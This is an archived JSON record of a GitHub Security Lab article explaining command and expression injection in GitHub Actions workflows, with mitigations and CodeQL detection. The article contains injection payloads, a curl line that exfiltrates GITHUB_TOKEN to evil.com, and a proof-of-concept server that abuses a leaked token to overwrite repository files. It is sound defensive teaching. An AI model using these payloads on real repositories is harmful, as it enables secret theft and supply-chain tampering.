{
	"id": "549d099d-03fd-4c3d-a20b-50324d60f800",
	"created_at": "2026-04-06T02:11:15.221855Z",
	"updated_at": "2026-04-10T03:24:29.088102Z",
	"deleted_at": null,
	"sha1_hash": "42a17d230d8a4369be22bc55fd02c8093bd9c77c",
	"title": "Keeping your GitHub Actions and workflows secure Part 2: Untrusted input",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113863,
	"plain_text": "Keeping your GitHub Actions and workflows secure Part 2:\r\nUntrusted input\r\nBy jarlob\r\nPublished: 2021-08-04 · Archived: 2026-04-06 01:57:40 UTC\r\nThis post is the second in a series of posts about GitHub Actions security. Part 1, Part 3, Part 4\r\nSecure your workflows with CodeQL: You can enable CodeQL for GitHub Actions to identify and fix the\r\npatterns described in this post.\r\nWe previously discussed the misuse of the pull_request_target trigger within GitHub Actions and workflows.\r\nIn this follow-up piece, we will discuss possible avenues of abuse that may result in code and command injection\r\nin otherwise seemingly secure workflows.\r\nGitHub Actions workflows can be triggered by a variety of events. Every workflow trigger is provided with a\r\nGitHub context that contains information about the triggering event, such as which user triggered it, the branch\r\nname, and other event context details. Some of this event data, like the base repository name, hash value of a\r\nchangeset, or pull request number, is unlikely to be controlled or used for injection by the user that triggered the\r\nevent (e.g. a pull request).\r\nHowever, there is a long list of event context data that might be attacker controlled and should be treated as\r\npotentially untrusted input:\r\ngithub.event.issue.title\r\ngithub.event.issue.body\r\ngithub.event.pull_request.title\r\ngithub.event.pull_request.body\r\ngithub.event.comment.body\r\ngithub.event.review.body\r\ngithub.event.pages.*.page_name\r\ngithub.event.commits.*.message\r\ngithub.event.head_commit.message\r\ngithub.event.head_commit.author.email\r\ngithub.event.head_commit.author.name\r\ngithub.event.commits.*.author.email\r\ngithub.event.commits.*.author.name\r\ngithub.event.pull_request.head.ref\r\ngithub.event.pull_request.head.label\r\ngithub.event.pull_request.head.repo.default_branch\r\ngithub.head_ref\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 1 of 7\n\nDevelopers should carefully handle potentially untrusted input and make sure it doesn’t flow into API calls where\r\nthe data could be interpreted as code.\r\nVulnerable Actions\r\nFor the Ekoparty 2020 CTF my colleague Bas Alberts created an intentionally vulnerable Action, written in\r\nPython, that took the body of an issue creation event and used it to construct a system command in an insecure\r\nway:\r\nos.system('echo \"%s\" \u003e /tmp/%s' % (body, notify_id))\r\nThe CTF players were able to inject a shell command by creating a specially crafted issue that abused the insecure\r\nhandling of untrusted input. As it turns out, truth is often stranger than fiction and I started finding similarly\r\nvulnerable GitHub Actions in the wild. For example the atlassian/gajira-comment Action.\r\nThis GitHub Action synchronizes GitHub issue comments with a corresponding ticket in an internal Jira server.\r\nBelow is an example usage:\r\nuses: atlassian/gajira-comment@v2.0.1\r\nwith:\r\n comment: |\r\n Comment created by {{ event.comment.user.login }}\r\n {{ event.comment.body }}\r\nIn the comment argument we can see a custom templating syntax. The Action was using lodash to interpolate\r\nvalues in {{ }} internally. This is safe as long as the template is controlled only by the creator of a workflow.\r\nUnfortunately it was mistakenly documented that users of this Action should use the GitHub expression syntax -\r\n${{ }} . This opened the door to a double expression evaluation vulnerability.\r\nLet’s say the Action user defined a workflow like:\r\nuses: atlassian/gajira-comment@v2.0.1\r\nwith:\r\n comment: |\r\n Comment created by ${{ event.comment.user.login }}\r\n ${{ github.event.comment.body }}\r\nIn the normal use case the template would be evaluated even before reaching the Action, into something like:\r\n Comment created by SomeUser\r\n It doesn't work on my machine.\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 2 of 7\n\nThere would be nothing to evaluate by the Action itself internally and it would work as expected. However if the\r\nuser’s comment contained double curly braces itself, like {{ 1 + 1 }} , the argument would be evaluated into:\r\n Comment created by SomeUser\r\n {{ 1 + 1 }}\r\nThen the Action would treat it as a valid template syntax and lodash would interpolate it into:\r\n Comment created by SomeUser\r\n 2\r\nThe untrusted user input was used to generate a template which supports expression interpolation. The templating\r\nengine in question, lodash, was powerful enough to run arbitrary Node.js code in the context of the GitHub\r\nActions runner.\r\nScript injections\r\nA different example involves scenarios where the injection sink is directly located in the workflow inline script.\r\nGitHub Actions support their own expression syntax that allows access to the values of the workflow context. A\r\nworkflow author often doesn’t even need to call any specific Action, as a lot can be accomplished using inline\r\nscripts with workflow expressions alone, e.g.:\r\n- name: Check title\r\n run: |\r\n title=\"${{ github.event.issue.title }}\"\r\n if [[ ! $title =~ ^.*:\\ .*$ ]]; then\r\n echo \"Bad issue title\"\r\n exit 1\r\n fi\r\nThe issue here is that the run operation generates a temporary shell script based on the template. The\r\nexpressions inside of ${{ }} are evaluated and substituted with the resulting values before the shell script is run\r\nwhich may make it vulnerable to shell command injection. Attackers may inject a shell command with a payload\r\nlike a\"; echo test or `echo test` .\r\nIn case of a call to an Action like:\r\nuses: fakeaction/checktitle@v3\r\nwith:\r\n title: ${{ github.event.issue.title }}\r\nthe context value is not used to generate a shell script, but is passed as an argument to the action, so it is not\r\nvulnerable to the injection.\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 3 of 7\n\nMost people understand that issue title , body , and comment contents in GitHub event contexts are fully\r\ncontrollable by would-be attackers. But there are also other less intuitive sources of potentially untrusted input.\r\nOne of them is the originating branch name for a pull request. The allowed charset for branch names is somewhat\r\nlimited and branches cannot have spaces or colons in their names. However, command injection is still possible.\r\nFor example zzz\";echo${IFS}\"hello\";# would be a valid branch name. As we will see later this is more than\r\nenough for attackers to compromise the target repository.\r\nAnother less obvious source of untrusted input is email addresses. As described in the following Wikipedia article,\r\nemail addresses can be quite flexible in terms of their content. All the listed addresses below are valid according to\r\nthe relevant IETF standards and subsequent RFCs (5322, 6854):\r\n\" \"@example.org\r\nmailhost!username@example.org\r\nuser%example.com@example.org\r\nThe address format is so complex that many validation scripts may erroneously block a registration of a valid, but\r\nless common email address. Nevertheless an email address like `echo${IFS}hello`@domain.com is perfectly\r\nvalid and may be used for both shell injection and receiving emails at the same time.\r\nExploitability and impact\r\nLet’s say there is a workflow with unsafe usage of an issue title in an inline script:\r\n- run: echo \"${{ github.event.issue.title }}\"\r\nIt can be injected with titles like z\"; exit 1;# or `id` . This allows an arbitrary attacker controlled command\r\nexecution similar to the arbitrary code execution discussed in the previous post. So what can an attacker achieve\r\nwith this kind of access in the context of a GitHub Actions runner?\r\nWorkflows triggered via the pull_request event have read-only permissions and no access to secrets. However,\r\nthese permissions differ between the various event triggers such as issue_comment , issues and push . An\r\nattacker could try to steal the repository secrets or even the repository write access token. If a secret or token is set\r\nto an environment variable like:\r\nenv:\r\n GITHUB_TOKEN: ${{ github.token }}\r\n PUBLISH_KEY: ${{ secrets.PUBLISH_KEY }}\r\nit can be directly accessed through the environment as demonstrated with e.g.: `printenv` .\r\nIf the secret is used directly in a expression like:\r\n- run: publisher ${{ secrets.PUBLISH_KEY }}\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 4 of 7\n\nor\r\nuses: fakeaction/publish@v3\r\nwith:\r\n key: ${{ secrets.PUBLISH_KEY }}\r\nthen, in the first case, the generated shell script is stored on disk and can be accessed there. In the second case it\r\ndepends on the way the program is using the argument. For example docker login stores credentials on disk in\r\n$HOME/.docker/config.json , Gajira-login action stores the credentials in $HOME/.jira.d/credentials , and\r\nActions/checkout action by default stores the repository token in a .git/config file unless the persist-credentials: false argument is set. Even if this is not the case the repository token and secrets are still in\r\nmemory. Although GitHub Actions scrub secrets from memory that are not referenced in the workflow or in an\r\nincluded Action, the repository token, whether it is referenced or not, and any referenced secrets can be harvested\r\nby a determined attacker.\r\nThe next question for the attacker is how to exfiltrate such secrets from the runner. GitHub Actions automatically\r\nredact secrets printed to the log in order to prevent accidental secret disclosure, but it is not a true security\r\nboundary since it is impossible to protect from intentional logging, so exfiltration of obfuscated secrets is still\r\npossible. For example: echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200}; . Also, since the attacker may\r\nrun arbitrary commands it is possible to simply make a HTTP request to an external attacker-controlled server\r\nwith the secret.\r\nGetting a repository access token is a bit harder. An Action runner gets a generated token with permissions that are\r\nlimited to the repository that contains the workflow and which expires after the workflow completes. Once\r\nexpired, the token is no longer useful to an attacker. One way to work around this limitation, is to automate the\r\nattack and perform it in fractions of a second by calling an attacker-controlled server with the token, e.g.: a\"; set\r\n+e; curl http://evil.com?token=$GITHUB_TOKEN;# .\r\nThe attacker server can use the GitHub API to modify repository content, including releases. Below is a proof of\r\nconcept server that uses the leaked repo token to overwrite package.json in the root of an affected repository:\r\nconst express = require('express');\r\nconst github = require('@actions/github');\r\nconst app = express();\r\nconst port = 80;\r\napp.get('/', async (req, res, next) =\u003e {\r\n try {\r\n const token = req.query.token;\r\n const octokit = github.getOctokit(token);\r\n const fileContent = Buffer\r\n .from('{\\n}')\r\n .toString('base64');\r\n // this is a targeted attack, repo name can be hardcoded\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 5 of 7\n\nconst owner = 'owner';\r\n const repo = 'repository';\r\n const branchName = 'main';\r\n const path = 'package.json';\r\n const content = await octokit.repos.getContent({\r\n owner: owner,\r\n repo: repo,\r\n ref: branchName,\r\n path: path\r\n });\r\n await octokit.repos.createOrUpdateFileContents({\r\n owner: owner,\r\n repo: repo,\r\n branch: branchName,\r\n path: path,\r\n message: 'bump dependencies',\r\n content: fileContent,\r\n sha: content.data.sha\r\n });\r\n res.sendStatus(200);\r\n next();\r\n } catch (error) {\r\n next(error);\r\n }\r\n});\r\napp.listen(port, () =\u003e {\r\n console.log(`Listening at http://localhost:${port}`);\r\n});\r\nThe best practice to avoid code and command injection vulnerabilities in GitHub workflows is to set the untrusted\r\ninput value of the expression to an intermediate environment variable:\r\n- name: print title\r\n env:\r\n TITLE: ${{ github.event.issue.title }}\r\n run: echo \"$TITLE\"\r\nThis way, the value of the ${{ github.event.issue.title }} expression is stored in memory and used as\r\nvariable instead of influencing the generation of script. As a side note, it is a good idea to double quote shell\r\nvariables to avoid word splitting, but this is one of many general recommendations for writing shell scripts, not\r\nspecific to GitHub Actions.\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 6 of 7\n\nIn order to catch and prevent the usage of the dangerous patterns as early as possible in the development lifecycle,\r\nthe GitHub Security Lab has developed CodeQL queries that can be integrated by repository owners into their\r\nCI/CD pipeline. Please note that currently the scripts depend on the CodeQL JavaScript libraries. In practice, this\r\nmeans that the analyzed repository must contain at least one JavaScript file and that CodeQL is configured to\r\nanalyze this language.\r\nThe script_injections.ql covers expression injections described in the article and is quite precise. However it\r\ndoesn’t do data flow tracking between workflow steps. The pull_request_target.ql results require more\r\nmanual review to identify if the code from pull request is actually treated in an unsafe manner as was explained in\r\nthe previous post.\r\nConclusion\r\nWhen writing custom GitHub Actions and workflows, consider that your code will often run with repo write\r\nprivileges on potentially untrusted input. Keep in mind that not all GitHub event context data can be trusted\r\nequally. By adopting the same defensive programming posture you would employ for any other privileged\r\napplication code you can ensure that your GitHub workflows stay as secure as the actual projects they service.\r\nThis post is the second in a series of posts about GitHub Actions security. Read the next post\r\nSource: https://securitylab.github.com/resources/github-actions-untrusted-input/\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securitylab.github.com/resources/github-actions-untrusted-input/"
	],
	"report_names": [
		"github-actions-untrusted-input"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441475,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.pdf",
		"text": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.txt",
		"img": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.jpg"
	}
}